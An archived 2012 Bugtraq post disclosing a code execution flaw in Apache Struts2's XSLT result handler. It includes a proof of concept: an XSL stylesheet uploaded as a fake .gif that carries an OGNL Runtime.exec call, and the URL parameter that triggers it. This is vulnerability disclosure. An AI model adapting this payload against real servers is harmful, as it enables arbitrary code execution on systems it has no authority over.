lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <201203220811.q2M8Bh5h013479@sf01web3.securityfocus.com>
Date: Thu, 22 Mar 2012 08:11:43 GMT
From: voidloafer@...il.com
To: bugtraq@...urityfocus.com
Subject: struts2 xsltResult Local code execution vulnerability

the file:

http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java

String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
templates = factory.newTemplates(new StreamSource(resource.openStream()));

A use of the action of xsltResult:
<action name="xslt" class="net.inbreak.xsltAction">
<result type="xslt"/>
</action>

An attacker can upload a file:

/upload/7758521.gif

<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<html> 
<body> 
<h2>hacked by kxlzx</h2> 
<h2>http://www.inbreak.net</h2> 
<exp>
<xsl:value-of select="ognl:getValue('@...time@...Runtime().exec("calc")', '')"/>
</exp>
</body> 
</html> 
</xsl:template> 
</xsl:stylesheet>

open url

http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif

then struts2 will execute

ognl:getValue('@...time@...Runtime().exec("calc")', '')

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ